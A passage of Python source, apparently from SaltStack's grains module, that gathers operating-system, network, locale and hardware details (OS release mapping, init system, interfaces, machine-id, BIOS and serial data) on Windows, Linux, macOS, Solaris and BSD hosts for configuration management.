(six.PY3 and
salt.utils.compare_versions(ver, '>=', [3, 5, 2, 'final', 0]))):
# (Product Type 1 is Desktop, Everything else is Server)
if info['ProductType'] > 1:
server = {'Vista': '2008Server',
'7': '2008ServerR2',
'8': '2012Server',
'8.1': '2012ServerR2',
'10': '2016Server'}
os_release = server.get(os_release,
'Grain not found. Update lookup table '
'in the `_windows_platform_data` '
'function in `grains\\core.py`')
service_pack = None
if info['ServicePackMajor'] > 0:
service_pack = ''.join(['SP', str(info['ServicePackMajor'])])
grains = {
'kernelrelease': _clean_value('kernelrelease', osinfo.Version),
'osversion': _clean_value('osversion', osinfo.Version),
'osrelease': _clean_value('osrelease', os_release),
'osservicepack': _clean_value('osservicepack', service_pack),
'osmanufacturer': _clean_value('osmanufacturer', osinfo.Manufacturer),
'manufacturer': _clean_value('manufacturer', systeminfo.Manufacturer),
'productname': _clean_value('productname', systeminfo.Model),
# bios name had a bunch of whitespace appended to it in my testing
# 'PhoenixBIOS 4.0 Release 6.0 '
'biosversion': _clean_value('biosversion', biosinfo.Name.strip()),
'serialnumber': _clean_value('serialnumber', biosinfo.SerialNumber),
'osfullname': _clean_value('osfullname', osinfo.Caption),
'timezone': _clean_value('timezone', timeinfo.Description),
'windowsdomain': _clean_value('windowsdomain', systeminfo.Domain),
'motherboard': {
'productname': _clean_value('motherboard.productname', motherboard['product']),
'serialnumber': _clean_value('motherboard.serialnumber', motherboard['serial']),
}
}
# test for virtualized environments
# I only had VMware available so the rest are unvalidated
if 'VRTUAL' in biosinfo.Version: # (not a typo)
grains['virtual'] = 'HyperV'
elif 'A M I' in biosinfo.Version:
grains['virtual'] = 'VirtualPC'
elif 'VMware' in systeminfo.Model:
grains['virtual'] = 'VMware'
elif 'VirtualBox' in systeminfo.Model:
grains['virtual'] = 'VirtualBox'
elif 'Xen' in biosinfo.Version:
grains['virtual'] = 'Xen'
if 'HVM domU' in systeminfo.Model:
grains['virtual_subtype'] = 'HVM domU'
elif 'OpenStack' in systeminfo.Model:
grains['virtual'] = 'OpenStack'
return grains
def _osx_platform_data():
'''
Additional data for macOS systems
Returns: A dictionary containing values for the following:
- model_name
- boot_rom_version
- smc_version
- system_serialnumber
'''
cmd = 'system_profiler SPHardwareDataType'
hardware = __salt__['cmd.run'](cmd)
grains = {}
for line in hardware.splitlines():
field_name, _, field_val = line.partition(': ')
if field_name.strip() == "Model Name":
key = 'model_name'
grains[key] = _clean_value(key, field_val)
if field_name.strip() == "Boot ROM Version":
key = 'boot_rom_version'
grains[key] = _clean_value(key, field_val)
if field_name.strip() == "SMC Version (system)":
key = 'smc_version'
grains[key] = _clean_value(key, field_val)
if field_name.strip() == "Serial Number (system)":
key = 'system_serialnumber'
grains[key] = _clean_value(key, field_val)
return grains
def id_():
'''
Return the id
'''
return {'id': __opts__.get('id', '')}
_REPLACE_LINUX_RE = re.compile(r'\W(?:gnu/)?linux', re.IGNORECASE)
# This maps (at most) the first ten characters (no spaces, lowercased) of
# 'osfullname' to the 'os' grain that Salt traditionally uses.
# Please see os_data() and _supported_dists.
# If your system is not detecting properly it likely needs an entry here.
_OS_NAME_MAP = {
'redhatente': 'RedHat',
'gentoobase': 'Gentoo',
'archarm': 'Arch ARM',
'arch': 'Arch',
'debian': 'Debian',
'raspbian': 'Raspbian',
'fedoraremi': 'Fedora',
'chapeau': 'Chapeau',
'korora': 'Korora',
'amazonami': 'Amazon',
'alt': 'ALT',
'enterprise': 'OEL',
'oracleserv': 'OEL',
'cloudserve': 'CloudLinux',
'cloudlinux': 'CloudLinux',
'pidora': 'Fedora',
'scientific': 'ScientificLinux',
'synology': 'Synology',
'nilrt': 'NILinuxRT',
'manjaro': 'Manjaro',
'antergos': 'Antergos',
'sles': 'SUSE',
'slesexpand': 'RES',
'void': 'Void',
'linuxmint': 'Mint',
}
# Map the 'os' grain to the 'os_family' grain
# These should always be capitalized entries as the lookup comes
# post-_OS_NAME_MAP. If your system is having trouble with detection, please
# make sure that the 'os' grain is capitalized and working correctly first.
_OS_FAMILY_MAP = {
'Ubuntu': 'Debian',
'Fedora': 'RedHat',
'Chapeau': 'RedHat',
'Korora': 'RedHat',
'FedBerry': 'RedHat',
'CentOS': 'RedHat',
'GoOSe': 'RedHat',
'Scientific': 'RedHat',
'Amazon': 'RedHat',
'CloudLinux': 'RedHat',
'OVS': 'RedHat',
'OEL': 'RedHat',
'XCP': 'RedHat',
'XenServer': 'RedHat',
'RES': 'RedHat',
'Sangoma': 'RedHat',
'Mandrake': 'Mandriva',
'ESXi': 'VMware',
'Mint': 'Debian',
'VMwareESX': 'VMware',
'Bluewhite64': 'Bluewhite',
'Slamd64': 'Slackware',
'SLES': 'Suse',
'SUSE Enterprise Server': 'Suse',
'SUSE Enterprise Server': 'Suse',
'SLED': 'Suse',
'openSUSE': 'Suse',
'SUSE': 'Suse',
'openSUSE Leap': 'Suse',
'openSUSE Tumbleweed': 'Suse',
'SLES_SAP': 'Suse',
'Solaris': 'Solaris',
'SmartOS': 'Solaris',
'OmniOS': 'Solaris',
'OpenIndiana Development': 'Solaris',
'OpenIndiana': 'Solaris',
'OpenSolaris Development': 'Solaris',
'OpenSolaris': 'Solaris',
'Oracle Solaris': 'Solaris',
'Arch ARM': 'Arch',
'Manjaro': 'Arch',
'Antergos': 'Arch',
'ALT': 'RedHat',
'Trisquel': 'Debian',
'GCEL': 'Debian',
'Linaro': 'Debian',
'elementary OS': 'Debian',
'ScientificLinux': 'RedHat',
'Raspbian': 'Debian',
'Devuan': 'Debian',
'antiX': 'Debian',
'NILinuxRT': 'NILinuxRT',
'Void': 'Void',
}
def _linux_bin_exists(binary):
'''
Does a binary exist in linux (depends on which, type, or whereis)
'''
for search_cmd in ('which', 'type -ap'):
try:
return __salt__['cmd.retcode'](
'{0} {1}'.format(search_cmd, binary)
) == 0
except salt.exceptions.CommandExecutionError:
pass
try:
return len(__salt__['cmd.run_all'](
'whereis -b {0}'.format(binary)
)['stdout'].split()) > 1
except salt.exceptions.CommandExecutionError:
return False
def _get_interfaces():
'''
Provide a dict of the connected interfaces and their ip addresses
'''
global _INTERFACES
if not _INTERFACES:
_INTERFACES = salt.utils.network.interfaces()
return _INTERFACES
def _parse_os_release():
'''
Parse /etc/os-release and return a parameter dictionary
See http://www.freedesktop.org/software/systemd/man/os-release.html
for specification of the file format.
'''
filename = '/etc/os-release'
if not os.path.isfile(filename):
filename = '/usr/lib/os-release'
data = dict()
with salt.utils.fopen(filename) as ifile:
regex = re.compile('^([\\w]+)=(?:\'|")?(.*?)(?:\'|")?$')
for line in ifile:
match = regex.match(line.strip())
if match:
# Shell special characters ("$", quotes, backslash, backtick)
# are escaped with backslashes
data[match.group(1)] = re.sub(r'\\([$"\'\\`])', r'\1', match.group(2))
return data
def os_data():
'''
Return grains pertaining to the operating system
'''
grains = {
'num_gpus': 0,
'gpus': [],
}
# Windows Server 2008 64-bit
# ('Windows', 'MINIONNAME', '2008ServerR2', '6.1.7601', 'AMD64',
# 'Intel64 Fam ily 6 Model 23 Stepping 6, GenuineIntel')
# Ubuntu 10.04
# ('Linux', 'MINIONNAME', '2.6.32-38-server',
# '#83-Ubuntu SMP Wed Jan 4 11:26:59 UTC 2012', 'x86_64', '')
# pylint: disable=unpacking-non-sequence
(grains['kernel'], grains['nodename'],
grains['kernelrelease'], version, grains['cpuarch'], _) = platform.uname()
# pylint: enable=unpacking-non-sequence
if salt.utils.is_proxy():
grains['kernel'] = 'proxy'
grains['kernelrelease'] = 'proxy'
grains['osrelease'] = 'proxy'
grains['os'] = 'proxy'
grains['os_family'] = 'proxy'
grains['osfullname'] = 'proxy'
elif salt.utils.is_windows():
grains['os'] = 'Windows'
grains['os_family'] = 'Windows'
grains.update(_memdata(grains))
grains.update(_windows_platform_data())
grains.update(_windows_cpudata())
grains.update(_windows_virtual(grains))
grains.update(_ps(grains))
if 'Server' in grains['osrelease']:
osrelease_info = grains['osrelease'].split('Server', 1)
osrelease_info[1] = osrelease_info[1].lstrip('R')
else:
osrelease_info = grains['osrelease'].split('.')
for idx, value in enumerate(osrelease_info):
if not value.isdigit():
continue
osrelease_info[idx] = int(value)
grains['osrelease_info'] = tuple(osrelease_info)
grains['osfinger'] = '{os}-{ver}'.format(
os=grains['os'],
ver=grains['osrelease'])
grains['init'] = 'Windows'
return grains
elif salt.utils.is_linux():
# Add SELinux grain, if you have it
if _linux_bin_exists('selinuxenabled'):
grains['selinux'] = {}
grains['selinux']['enabled'] = __salt__['cmd.retcode'](
'selinuxenabled'
) == 0
if _linux_bin_exists('getenforce'):
grains['selinux']['enforced'] = __salt__['cmd.run'](
'getenforce'
).strip()
# Add systemd grain, if you have it
if _linux_bin_exists('systemctl') and _linux_bin_exists('localectl'):
grains['systemd'] = {}
systemd_info = __salt__['cmd.run'](
'systemctl --version'
).splitlines()
grains['systemd']['version'] = systemd_info[0].split()[1]
grains['systemd']['features'] = systemd_info[1]
# Add init grain
grains['init'] = 'unknown'
try:
os.stat('/run/systemd/system')
grains['init'] = 'systemd'
except (OSError, IOError):
if os.path.exists('/proc/1/cmdline'):
with salt.utils.fopen('/proc/1/cmdline') as fhr:
init_cmdline = fhr.read().replace('\x00', ' ').split()
init_bin = salt.utils.which(init_cmdline[0])
if init_bin is not None and init_bin.endswith('bin/init'):
supported_inits = (six.b('upstart'), six.b('sysvinit'), six.b('systemd'))
edge_len = max(len(x) for x in supported_inits) - 1
try:
buf_size = __opts__['file_buffer_size']
except KeyError:
# Default to the value of file_buffer_size for the minion
buf_size = 262144
try:
with salt.utils.fopen(init_bin, 'rb') as fp_:
buf = True
edge = six.b('')
buf = fp_.read(buf_size).lower()
while buf:
buf = edge + buf
for item in supported_inits:
if item in buf:
if six.PY3:
item = item.decode('utf-8')
grains['init'] = item
buf = six.b('')
break
edge = buf[-edge_len:]
buf = fp_.read(buf_size).lower()
except (IOError, OSError) as exc:
log.error(
'Unable to read from init_bin ({0}): {1}'
.format(init_bin, exc)
)
elif salt.utils.which('supervisord') in init_cmdline:
grains['init'] = 'supervisord'
elif init_cmdline == ['runit']:
grains['init'] = 'runit'
else:
log.info(
'Could not determine init system from command line: ({0})'
.format(' '.join(init_cmdline))
)
# Add lsb grains on any distro with lsb-release
try:
import lsb_release # pylint: disable=import-error
release = lsb_release.get_distro_information()
for key, value in six.iteritems(release):
key = key.lower()
lsb_param = 'lsb_{0}{1}'.format(
'' if key.startswith('distrib_') else 'distrib_',
key
)
grains[lsb_param] = value
# Catch a NameError to workaround possible breakage in lsb_release
# See https://github.com/saltstack/salt/issues/37867
except (ImportError, NameError):
# if the python library isn't available, default to regex
if os.path.isfile('/etc/lsb-release'):
# Matches any possible format:
# DISTRIB_ID="Ubuntu"
# DISTRIB_ID='Mageia'
# DISTRIB_ID=Fedora
# DISTRIB_RELEASE='10.10'
# DISTRIB_CODENAME='squeeze'
# DISTRIB_DESCRIPTION='Ubuntu 10.10'
regex = re.compile((
'^(DISTRIB_(?:ID|RELEASE|CODENAME|DESCRIPTION))=(?:\'|")?'
'([\\w\\s\\.\\-_]+)(?:\'|")?'
))
with salt.utils.fopen('/etc/lsb-release') as ifile:
for line in ifile:
match = regex.match(line.rstrip('\n'))
if match:
# Adds:
# lsb_distrib_{id,release,codename,description}
grains[
'lsb_{0}'.format(match.groups()[0].lower())
] = match.groups()[1].rstrip()
if grains.get('lsb_distrib_description', '').lower().startswith('antergos'):
# Antergos incorrectly configures their /etc/lsb-release,
# setting the DISTRIB_ID to "Arch". This causes the "os" grain
# to be incorrectly set to "Arch".
grains['osfullname'] = 'Antergos Linux'
elif 'lsb_distrib_id' not in grains:
if os.path.isfile('/etc/os-release') or os.path.isfile('/usr/lib/os-release'):
os_release = _parse_os_release()
if 'NAME' in os_release:
grains['lsb_distrib_id'] = os_release['NAME'].strip()
if 'VERSION_ID' in os_release:
grains['lsb_distrib_release'] = os_release['VERSION_ID']
if 'PRETTY_NAME' in os_release:
grains['lsb_distrib_codename'] = os_release['PRETTY_NAME']
if 'CPE_NAME' in os_release:
if ":suse:" in os_release['CPE_NAME'] or ":opensuse:" in os_release['CPE_NAME']:
grains['os'] = "SUSE"
# openSUSE `osfullname` grain normalization
if os_release.get("NAME") == "openSUSE Leap":
grains['osfullname'] = "Leap"
elif os_release.get("VERSION") == "Tumbleweed":
grains['osfullname'] = os_release["VERSION"]
elif os.path.isfile('/etc/SuSE-release'):
grains['lsb_distrib_id'] = 'SUSE'
version = ''
patch = ''
with salt.utils.fopen('/etc/SuSE-release') as fhr:
for line in fhr:
if 'enterprise' in line.lower():
grains['lsb_distrib_id'] = 'SLES'
grains['lsb_distrib_codename'] = re.sub(r'\(.+\)', '', line).strip()
elif 'version' in line.lower():
version = re.sub(r'[^0-9]', '', line)
elif 'patchlevel' in line.lower():
patch = re.sub(r'[^0-9]', '', line)
grains['lsb_distrib_release'] = version
if patch:
grains['lsb_distrib_release'] += '.' + patch
patchstr = 'SP' + patch
if grains['lsb_distrib_codename'] and patchstr not in grains['lsb_distrib_codename']:
grains['lsb_distrib_codename'] += ' ' + patchstr
if not grains['lsb_distrib_codename']:
grains['lsb_distrib_codename'] = 'n.a'
elif os.path.isfile('/etc/altlinux-release'):
# ALT Linux
grains['lsb_distrib_id'] = 'altlinux'
with salt.utils.fopen('/etc/altlinux-release') as ifile:
# This file is symlinked to from:
# /etc/fedora-release
# /etc/redhat-release
# /etc/system-release
for line in ifile:
# ALT Linux Sisyphus (unstable)
comps = line.split()
if comps[0] == 'ALT':
grains['lsb_distrib_release'] = comps[2]
grains['lsb_distrib_codename'] = \
comps[3].replace('(', '').replace(')', '')
elif os.path.isfile('/etc/centos-release'):
# CentOS Linux
grains['lsb_distrib_id'] = 'CentOS'
with salt.utils.fopen('/etc/centos-release') as ifile:
for line in ifile:
# Need to pull out the version and codename
# in the case of custom content in /etc/centos-release
find_release = re.compile(r'\d+\.\d+')
find_codename = re.compile(r'(?<=\()(.*?)(?=\))')
release = find_release.search(line)
codename = find_codename.search(line)
if release is not None:
grains['lsb_distrib_release'] = release.group()
if codename is not None:
grains['lsb_distrib_codename'] = codename.group()
elif os.path.isfile('/etc.defaults/VERSION') \
and os.path.isfile('/etc.defaults/synoinfo.conf'):
grains['osfullname'] = 'Synology'
with salt.utils.fopen('/etc.defaults/VERSION', 'r') as fp_:
synoinfo = {}
for line in fp_:
try:
key, val = line.rstrip('\n').split('=')
except ValueError:
continue
if key in ('majorversion', 'minorversion',
'buildnumber'):
synoinfo[key] = val.strip('"')
if len(synoinfo) != 3:
log.warning(
'Unable to determine Synology version info. '
'Please report this, as it is likely a bug.'
)
else:
grains['osrelease'] = (
'{majorversion}.{minorversion}-{buildnumber}'
.format(**synoinfo)
)
# Use the already intelligent platform module to get distro info
# (though apparently it's not intelligent enough to strip quotes)
(osname, osrelease, oscodename) = \
[x.strip('"').strip("'") for x in
platform.linux_distribution(supported_dists=_supported_dists)]
# Try to assign these three names based on the lsb info, they tend to
# be more accurate than what python gets from /etc/DISTRO-release.
# It's worth noting that Ubuntu has patched their Python distribution
# so that platform.linux_distribution() does the /etc/lsb-release
# parsing, but we do it anyway here for the sake for full portability.
if 'osfullname' not in grains:
grains['osfullname'] = \
grains.get('lsb_distrib_id', osname).strip()
if 'osrelease' not in grains:
# NOTE: This is a workaround for CentOS 7 os-release bug
# https://bugs.centos.org/view.php?id=8359
# /etc/os-release contains no minor distro release number so we fall back to parse
# /etc/centos-release file instead.
# Commit introducing this comment should be reverted after the upstream bug is released.
if 'CentOS Linux 7' in grains.get('lsb_distrib_codename', ''):
grains.pop('lsb_distrib_release', None)
grains['osrelease'] = \
grains.get('lsb_distrib_release', osrelease).strip()
grains['oscodename'] = grains.get('lsb_distrib_codename', '').strip() or oscodename
if 'Red Hat' in grains['oscodename']:
grains['oscodename'] = oscodename
distroname = _REPLACE_LINUX_RE.sub('', grains['osfullname']).strip()
# return the first ten characters with no spaces, lowercased
shortname = distroname.replace(' ', '').lower()[:10]
# this maps the long names from the /etc/DISTRO-release files to the
# traditional short names that Salt has used.
if 'os' not in grains:
grains['os'] = _OS_NAME_MAP.get(shortname, distroname)
grains.update(_linux_cpudata())
grains.update(_linux_gpu_data())
elif grains['kernel'] == 'SunOS':
if salt.utils.is_smartos():
# See https://github.com/joyent/smartos-live/issues/224
uname_v = os.uname()[3] # format: joyent_20161101T004406Z
uname_v = uname_v[uname_v.index('_')+1:]
grains['os'] = grains['osfullname'] = 'SmartOS'
# store a parsed version of YYYY.MM.DD as osrelease
grains['osrelease'] = ".".join([
uname_v.split('T')[0][0:4],
uname_v.split('T')[0][4:6],
uname_v.split('T')[0][6:8],
])
# store a untouched copy of the timestamp in osrelease_stamp
grains['osrelease_stamp'] = uname_v
if salt.utils.is_smartos_globalzone():
grains.update(_smartos_computenode_data())
elif os.path.isfile('/etc/release'):
with salt.utils.fopen('/etc/release', 'r') as fp_:
rel_data = fp_.read()
try:
release_re = re.compile(
r'((?:Open|Oracle )?Solaris|OpenIndiana|OmniOS) (Development)?'
r'\s*(\d+\.?\d*|v\d+)\s?[A-Z]*\s?(r\d+|\d+\/\d+|oi_\S+|snv_\S+)?'
)
osname, development, osmajorrelease, osminorrelease = \
release_re.search(rel_data).groups()
except AttributeError:
# Set a blank osrelease grain and fallback to 'Solaris'
# as the 'os' grain.
grains['os'] = grains['osfullname'] = 'Solaris'
grains['osrelease'] = ''
else:
if development is not None:
osname = ' '.join((osname, development))
uname_v = os.uname()[3]
grains['os'] = grains['osfullname'] = osname
if osname in ['Oracle Solaris'] and uname_v.startswith(osmajorrelease):
# Oracla Solars 11 and up have minor version in uname
grains['osrelease'] = uname_v
elif osname in ['OmniOS']:
# OmniOS
osrelease = []
osrelease.append(osmajorrelease[1:])
osrelease.append(osminorrelease[1:])
grains['osrelease'] = ".".join(osrelease)
grains['osrelease_stamp'] = uname_v
else:
# Sun Solaris 10 and earlier/comparable
osrelease = []
osrelease.append(osmajorrelease)
if osminorrelease:
osrelease.append(osminorrelease)
grains['osrelease'] = ".".join(osrelease)
grains['osrelease_stamp'] = uname_v
grains.update(_sunos_cpudata())
elif grains['kernel'] == 'VMkernel':
grains['os'] = 'ESXi'
elif grains['kernel'] == 'Darwin':
osrelease = __salt__['cmd.run']('sw_vers -productVersion')
osname = __salt__['cmd.run']('sw_vers -productName')
osbuild = __salt__['cmd.run']('sw_vers -buildVersion')
grains['os'] = 'MacOS'
grains['os_family'] = 'MacOS'
grains['osfullname'] = "{0} {1}".format(osname, osrelease)
grains['osrelease'] = osrelease
grains['osbuild'] = osbuild
grains['init'] = 'launchd'
grains.update(_bsd_cpudata(grains))
grains.update(_osx_gpudata())
grains.update(_osx_platform_data())
else:
grains['os'] = grains['kernel']
if grains['kernel'] == 'FreeBSD':
try:
grains['osrelease'] = __salt__['cmd.run']('freebsd-version -u').split('-')[0]
except salt.exceptions.CommandExecutionError:
# freebsd-version was introduced in 10.0.
# derive osrelease from kernelversion prior to that
grains['osrelease'] = grains['kernelrelease'].split('-')[0]
grains.update(_bsd_cpudata(grains))
if grains['kernel'] in ('OpenBSD', 'NetBSD'):
grains.update(_bsd_cpudata(grains))
grains['osrelease'] = grains['kernelrelease'].split('-')[0]
if grains['kernel'] == 'NetBSD':
grains.update(_netbsd_gpu_data())
if not grains['os']:
grains['os'] = 'Unknown {0}'.format(grains['kernel'])
grains['os_family'] = 'Unknown'
else:
# this assigns family names based on the os name
# family defaults to the os name if not found
grains['os_family'] = _OS_FAMILY_MAP.get(grains['os'],
grains['os'])
# Build the osarch grain. This grain will be used for platform-specific
# considerations such as package management. Fall back to the CPU
# architecture.
if grains.get('os_family') == 'Debian':
osarch = __salt__['cmd.run']('dpkg --print-architecture').strip()
elif grains.get('os_family') == 'RedHat':
osarch = __salt__['cmd.run']('rpm --eval %{_host_cpu}').strip()
elif grains.get('os_family') == 'NILinuxRT':
archinfo = {}
for line in __salt__['cmd.run']('opkg print-architecture').splitlines():
if line.startswith('arch'):
_, arch, priority = line.split()
archinfo[arch.strip()] = int(priority.strip())
# Return osarch in priority order (higher to lower)
osarch = sorted(archinfo, key=archinfo.get, reverse=True)
else:
osarch = grains['cpuarch']
grains['osarch'] = osarch
grains.update(_memdata(grains))
# Get the hardware and bios data
grains.update(_hw_data(grains))
# Get zpool data
grains.update(_zpool_data(grains))
# Load the virtual machine info
grains.update(_virtual(grains))
grains.update(_ps(grains))
if grains.get('osrelease', ''):
osrelease_info = grains['osrelease'].split('.')
for idx, value in enumerate(osrelease_info):
if not value.isdigit():
continue
osrelease_info[idx] = int(value)
grains['osrelease_info'] = tuple(osrelease_info)
grains['osmajorrelease'] = str(grains['osrelease_info'][0]) # This will be an integer in the two releases
os_name = grains['os' if grains.get('os') in (
'FreeBSD', 'OpenBSD', 'NetBSD', 'Mac', 'Raspbian') else 'osfullname']
grains['osfinger'] = '{0}-{1}'.format(
os_name, grains['osrelease'] if os_name in ('Ubuntu',) else grains['osrelease_info'][0])
return grains
def locale_info():
'''
Provides
defaultlanguage
defaultencoding
'''
grains = {}
grains['locale_info'] = {}
if salt.utils.is_proxy():
return grains
try:
(
grains['locale_info']['defaultlanguage'],
grains['locale_info']['defaultencoding']
) = locale.getdefaultlocale()
except Exception:
# locale.getdefaultlocale can ValueError!! Catch anything else it
# might do, per #2205
grains['locale_info']['defaultlanguage'] = 'unknown'
grains['locale_info']['defaultencoding'] = 'unknown'
grains['locale_info']['detectedencoding'] = __salt_system_encoding__
return grains
def hostname():
'''
Return fqdn, hostname, domainname
'''
# This is going to need some work
# Provides:
# fqdn
# host
# localhost
# domain
global __FQDN__
grains = {}
if salt.utils.is_proxy():
return grains
grains['localhost'] = socket.gethostname()
if __FQDN__ is None:
__FQDN__ = salt.utils.network.get_fqhostname()
# On some distros (notably FreeBSD) if there is no hostname set
# salt.utils.network.get_fqhostname() will return None.
# In this case we punt and log a message at error level, but force the
# hostname and domain to be localhost.localdomain
# Otherwise we would stacktrace below
if __FQDN__ is None: # still!
log.error('Having trouble getting a hostname. Does this machine have its hostname and domain set properly?')
__FQDN__ = 'localhost.localdomain'
grains['fqdn'] = __FQDN__
(grains['host'], grains['domain']) = grains['fqdn'].partition('.')[::2]
return grains
def append_domain():
'''
Return append_domain if set
'''
grain = {}
if salt.utils.is_proxy():
return grain
if 'append_domain' in __opts__:
grain['append_domain'] = __opts__['append_domain']
return grain
def ip_fqdn():
'''
Return ip address and FQDN grains
'''
if salt.utils.is_proxy():
return {}
ret = {}
ret['ipv4'] = salt.utils.network.ip_addrs(include_loopback=True)
ret['ipv6'] = salt.utils.network.ip_addrs6(include_loopback=True)
_fqdn = hostname()['fqdn']
for socket_type, ipv_num in ((socket.AF_INET, '4'), (socket.AF_INET6, '6')):
key = 'fqdn_ip' + ipv_num
if not ret['ipv' + ipv_num]:
ret[key] = []
else:
try:
info = socket.getaddrinfo(_fqdn, None, socket_type)
ret[key] = list(set(item[4][0] for item in info))
except socket.error:
ret[key] = []
return ret
def ip_interfaces():
'''
Provide a dict of the connected interfaces and their ip addresses
The addresses will be passed as a list for each interface
'''
# Provides:
# ip_interfaces
if salt.utils.is_proxy():
return {}
ret = {}
ifaces = _get_interfaces()
for face in ifaces:
iface_ips = []
for inet in ifaces[face].get('inet', []):
if 'address' in inet:
iface_ips.append(inet['address'])
for inet in ifaces[face].get('inet6', []):
if 'address' in inet:
iface_ips.append(inet['address'])
for secondary in ifaces[face].get('secondary', []):
if 'address' in secondary:
iface_ips.append(secondary['address'])
ret[face] = iface_ips
return {'ip_interfaces': ret}
def ip4_interfaces():
'''
Provide a dict of the connected interfaces and their ip4 addresses
The addresses will be passed as a list for each interface
'''
# Provides:
# ip_interfaces
if salt.utils.is_proxy():
return {}
ret = {}
ifaces = _get_interfaces()
for face in ifaces:
iface_ips = []
for inet in ifaces[face].get('inet', []):
if 'address' in inet:
iface_ips.append(inet['address'])
for secondary in ifaces[face].get('secondary', []):
if 'address' in secondary:
iface_ips.append(secondary['address'])
ret[face] = iface_ips
return {'ip4_interfaces': ret}
def ip6_interfaces():
'''
Provide a dict of the connected interfaces and their ip6 addresses
The addresses will be passed as a list for each interface
'''
# Provides:
# ip_interfaces
if salt.utils.is_proxy():
return {}
ret = {}
ifaces = _get_interfaces()
for face in ifaces:
iface_ips = []
for inet in ifaces[face].get('inet6', []):
if 'address' in inet:
iface_ips.append(inet['address'])
for secondary in ifaces[face].get('secondary', []):
if 'address' in secondary:
iface_ips.append(secondary['address'])
ret[face] = iface_ips
return {'ip6_interfaces': ret}
def hwaddr_interfaces():
'''
Provide a dict of the connected interfaces and their
hw addresses (Mac Address)
'''
# Provides:
# hwaddr_interfaces
ret = {}
ifaces = _get_interfaces()
for face in ifaces:
if 'hwaddr' in ifaces[face]:
ret[face] = ifaces[face]['hwaddr']
return {'hwaddr_interfaces': ret}
def dns():
'''
Parse the resolver configuration file
.. versionadded:: 2016.3.0
'''
# Provides:
# dns
if salt.utils.is_windows() or 'proxyminion' in __opts__:
return {}
resolv = salt.utils.dns.parse_resolv()
for key in ('nameservers', 'ip4_nameservers', 'ip6_nameservers',
'sortlist'):
if key in resolv:
resolv[key] = [str(i) for i in resolv[key]]
return {'dns': resolv} if resolv else {}
def get_machine_id():
'''
Provide the machine-id
'''
# Provides:
# machine-id
locations = ['/etc/machine-id', '/var/lib/dbus/machine-id']
existing_locations = [loc for loc in locations if os.path.exists(loc)]
if not existing_locations:
return {}
else:
with salt.utils.fopen(existing_locations[0]) as machineid:
return {'machine_id': machineid.read().strip()}
def path():
'''
Return the path
'''
# Provides:
# path
return {'path': os.environ.get('PATH', '').strip()}
def pythonversion():
'''
Return the Python version
'''
# Provides:
# pythonversion
return {'pythonversion': list(sys.version_info)}
def pythonpath():
'''
Return the Python path
'''
# Provides:
# pythonpath
return {'pythonpath': sys.path}
def pythonexecutable():
'''
Return the python executable in use
'''
# Provides:
# pythonexecutable
return {'pythonexecutable': sys.executable}
def saltpath():
'''
Return the path of the salt module
'''
# Provides:
# saltpath
salt_path = os.path.abspath(os.path.join(__file__, os.path.pardir))
return {'saltpath': os.path.dirname(salt_path)}
def saltversion():
'''
Return the version of salt
'''
# Provides:
# saltversion
from salt.version import __version__
return {'saltversion': __version__}
def zmqversion():
'''
Return the zeromq version
'''
# Provides:
# zmqversion
try:
import zmq
return {'zmqversion': zmq.zmq_version()} # pylint: disable=no-member
except ImportError:
return {}
def saltversioninfo():
'''
Return the version_info of salt
.. versionadded:: 0.17.0
'''
# Provides:
# saltversioninfo
from salt.version import __version_info__
return {'saltversioninfo': list(__version_info__)}
def _hw_data(osdata):
'''
Get system specific hardware data from dmidecode
Provides
biosversion
productname
manufacturer
serialnumber
biosreleasedate
uuid
.. versionadded:: 0.9.5
'''
if salt.utils.is_proxy():
return {}
grains = {}
# On SmartOS (possibly SunOS also) smbios only works in the global zone
# smbios is also not compatible with linux's smbios (smbios -s = print summarized)
if salt.utils.which_bin(['dmidecode', 'smbios']) is not None and not (
salt.utils.is_smartos() or
( # SunOS on SPARC - 'smbios: failed to load SMBIOS: System does not export an SMBIOS table'
osdata['kernel'] == 'SunOS' and
osdata['cpuarch'].startswith('sparc')
)):
grains = {
'biosversion': __salt__['smbios.get']('bios-version'),
'productname': __salt__['smbios.get']('system-product-name'),
'manufacturer': __salt__['smbios.get']('system-manufacturer'),
'biosreleasedate': __salt__['smbios.get']('bios-release-date'),
'uuid': __salt__['smbios.get']('system-uuid')
}
grains = dict([(key, val) for key, val in grains.items() if val is not None])
uuid = __salt__['smbios.get']('system-uuid')
if uuid is not None:
grains['uuid'] = uuid.lower()
for serial in ('system-serial-number', 'chassis-serial-number', 'baseboard-serial-number'):
serial = __salt__['smbios.get'](serial)
if serial is not None:
grains['serialnumber'] = serial
break
elif osdata['kernel'] == 'FreeBSD':
# On FreeBSD /bin/kenv (already in base system)
# can be used instead of dmidecode
kenv = salt.utils.which('kenv')
if kenv:
# In theory, it will be easier to add new fields to this later
fbsd_hwdata = {
'biosversion': 'smbios.bios.version',
'manufacturer': 'smbios.system.maker',
'serialnumber': 'smbios.system.serial',
'productname': 'smbios.system.product',
'biosreleasedate': 'smbios.bios.reldate',
'uuid': 'smbios.system.uuid',
}
for key, val in six.iteritems(fbsd_hwdata):
value = __salt__['cmd.run']('{0} {1}'.format(kenv, val))
grains[key] = _clean_value(key, value)
elif osdata['kernel'] == 'OpenBSD':
sysctl = salt.utils.which('sysctl')
hwdata = {'biosversion': 'hw.version',
'manufacturer': 'hw.vendor',
'productname': 'hw.product',
'serialnumber': 'hw.serialno',
'uuid': 'hw.uuid'}
for key, oid in six.iteritems(hwdata):
value = __salt__['cmd.run']('{0} -n {1}'.format(sysctl, oid))
if not value.endswith(' value is not available'):
grains[key] = _clean_value(key, value)
elif osdata['kernel'] == 'NetBSD':
sysctl = salt.utils.which('sysctl')
nbsd_hwdata = {
'biosversion': 'machdep.dmi.board-version',
'manufacturer': 'machdep.dmi.system-vendor',
'serialnumber': 'machdep.dmi.system-serial',
'productname': 'machdep.dmi.system-product',
'biosreleasedate': 'machdep.dmi.bios-date',
'uuid': 'machdep.dmi.system-uuid',
}
for key, oid in six.iteritems(nbsd_hwdata):
result = __salt__['cmd.run_all']('{0} -n {1}'.format(sysctl, oid))
if result['retcode'] == 0:
grains[key] = _clean_value(key, result['stdout'])
elif osdata['kernel'] == 'Darwin':
grains['manufacturer'] = 'Apple Inc.'
sysctl = salt.utils.which('sysctl')
hwdata = {'productname': 'hw.model'}
for key, oid in hwdata.items():
value = __salt__['cmd.run']('{0} -b {1}'.format(sysctl, oid))
if not value.endswith(' is invalid'):
grains[key] = _clean_value(key, value)
elif osdata['kernel'] == 'SunOS' and osdata['cpuarch'].startswith('sparc'):
# Depending on the hardware model, commands can report different bits
